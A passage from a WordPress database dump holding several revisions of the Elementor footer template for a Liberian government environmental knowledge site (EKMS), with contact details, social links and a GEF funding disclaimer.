Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":37.035,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.983},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":50.593,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":14.38},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":49.204,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25866,3810,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25868,3811,'_elementor_edit_mode','builder'),(25869,3811,'_elementor_template_type','footer'),(25870,3811,'_elementor_version','3.3.1'),(25871,3811,'_elementor_pro_version','3.3.6'),(25872,3811,'_wp_page_template','default'),(25873,3811,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}]},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.768,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":4.422},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":57.421,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":14.38},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":49.204,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25875,3811,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25877,3812,'_elementor_edit_mode','builder'),(25878,3812,'_elementor_template_type','footer'),(25879,3812,'_elementor_version','3.3.1'),(25880,3812,'_elementor_pro_version','3.3.6'),(25881,3812,'_wp_page_template','default'),(25882,3812,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}]},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.768,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":4.422},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attr